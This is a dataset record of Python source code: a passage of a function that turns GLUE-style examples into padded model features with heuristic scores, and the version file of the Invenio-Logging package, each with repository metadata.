    pad_token_segment_id=0,
    mask_padding_with_zero=True,
    heuristics=True,
    data_split='train',
):
    """Convert GLUE-style examples into ``AdaptedInputFeatures``.

    Adapted from ``transformers.glue_convert_examples_to_features``: besides
    the usual ids/masks/labels, each feature also carries a unique integer
    example id, the example's original index, and (optionally) per-example
    heuristic scores loaded via ``get_instance_heuristics``.

    Args:
        examples: list of ``InputExample`` objects, or a ``tf.data.Dataset``.
        tokenizer: tokenizer used to encode the text pairs.
        max_length: target sequence length; shorter inputs are zero-padded.
        task: GLUE task name; used to resolve processor/labels/output mode.
        label_list: label names; inferred from ``task`` when ``None``.
        output_mode: "classification" or "regression"; inferred when ``None``.
        pad_on_left: pad on the left instead of the right (e.g. for XLNet).
        pad_token: token id used for padding.
        pad_token_segment_id: segment id used for padding positions.
        mask_padding_with_zero: real tokens get mask 1 and padding 0 if True
            (flipped otherwise).
        heuristics: attach lexical/constituent/subsequence scores from disk.
        data_split: which split's heuristic file to load.

    Returns:
        A ``tf.data.Dataset`` when the input was one, otherwise a list of
        ``AdaptedInputFeatures``.

    Raises:
        KeyError: if ``output_mode`` is neither "classification" nor
            "regression".
    """
    is_tf_dataset = False
    if is_tf_available() and isinstance(examples, tf.data.Dataset):
        is_tf_dataset = True
    if task is not None:
        processor = glue_processors[task]()
        if label_list is None:
            label_list = processor.get_labels()
            logger.info("Using label list %s for task %s" % (label_list, task))
        if output_mode is None:
            output_mode = glue_output_modes[task]
            logger.info("Using output mode %s for task %s" % (output_mode, task))
    label_map = {label: i for i, label in enumerate(label_list)}
    features = []
    lex = []
    const = []
    subs = []
    if heuristics:
        lex, const, subs = get_instance_heuristics(task, data_split)
    for (ex_index, example) in enumerate(examples):
        len_examples = 0
        if is_tf_dataset:
            example = processor.get_example_from_tensor_dict(example)
            example = processor.tfds_map(example)
            len_examples = tf.data.experimental.cardinality(examples)
        else:
            len_examples = len(examples)
        if ex_index % 10000 == 0:
            logger.info("Writing example %d/%d" % (ex_index, len_examples))
        inputs = tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length,)
        input_ids, token_type_ids = inputs["input_ids"], inputs["token_type_ids"]
        # The mask has 1 for real tokens and 0 for padding (flipped when
        # mask_padding_with_zero is False).
        attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
        # Zero-pad up to max_length, on whichever side the model expects.
        padding_length = max_length - len(input_ids)
        if pad_on_left:
            input_ids = ([pad_token] * padding_length) + input_ids
            attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
            token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
        else:
            input_ids = input_ids + ([pad_token] * padding_length)
            attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
            token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
        assert len(input_ids) == max_length, "Error with input length {} vs {}".format(len(input_ids), max_length)
        assert len(attention_mask) == max_length, "Error with input length {} vs {}".format(
            len(attention_mask), max_length
        )
        assert len(token_type_ids) == max_length, "Error with input length {} vs {}".format(
            len(token_type_ids), max_length
        )
        if output_mode == "classification":
            label = label_map[example.label]
        elif output_mode == "regression":
            label = float(example.label)
        else:
            raise KeyError(output_mode)
        # Deterministic integer id derived from the string guid.
        example_int_id = convert_string_to_unique_number(example.guid)
        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info(f"guid: {example_int_id}")
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
            logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
            logger.info("label: %s (id = %d)" % (example.label, label))
        features.append(
            AdaptedInputFeatures(input_ids=input_ids,
                                 attention_mask=attention_mask,
                                 token_type_ids=token_type_ids,
                                 label=label,
                                 example_id=example_int_id,
                                 lex=None if len(lex) == 0 else lex[ex_index],
                                 const=None if len(const) == 0 else const[ex_index],
                                 # BUG FIX: guard `subs` by its own length
                                 # (previously checked len(const)).
                                 subs=None if len(subs) == 0 else subs[ex_index],
                                 original_idx=ex_index))
    if is_tf_available() and is_tf_dataset:

        def gen():
            for ex in features:
                yield (
                    {
                        "input_ids": ex.input_ids,
                        "attention_mask": ex.attention_mask,
                        "token_type_ids": ex.token_type_ids,
                    },
                    ex.label,
                )

        return tf.data.Dataset.from_generator(
            gen,
            ({"input_ids": tf.int32, "attention_mask": tf.int32, "token_type_ids": tf.int32}, tf.int64),
            (
                {
                    "input_ids": tf.TensorShape([None]),
                    "attention_mask": tf.TensorShape([None]),
                    "token_type_ids": tf.TensorShape([None]),
                },
                tf.TensorShape([]),
            ),
        )
    return features
def adapted_glue_compute_metrics(task_name, preds, labels):
    """Adapted from `glue_compute_metrics` to also handle SNLI, Winogrande and Toxic."""
    try:
        return glue_compute_metrics(task_name, preds, labels)
    except KeyError:
        if task_name in ["snli", "winogrande", "toxic"]:
            # These tasks use plain accuracy, the same metric as MNLI.
            return glue_compute_metrics("mnli", preds, labels)
    raise KeyError(task_name)
| true | true |
f72ef9d32075ad3081247fcdbd108c4a87b8024a | 446 | py | Python | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | invenio_logging/version.py | kprzerwa/invenio-logging | 1eab0074eaf732f8bd303817e931fdf0c0a53b71 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Version information for Invenio-Logging.
This file is imported by ``invenio_logging.__init__``,
and parsed by ``setup.py``.
"""
from __future__ import absolute_import, print_function
__version__ = '1.2.0'
| 24.777778 | 72 | 0.726457 |
from __future__ import absolute_import, print_function
__version__ = '1.2.0'
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.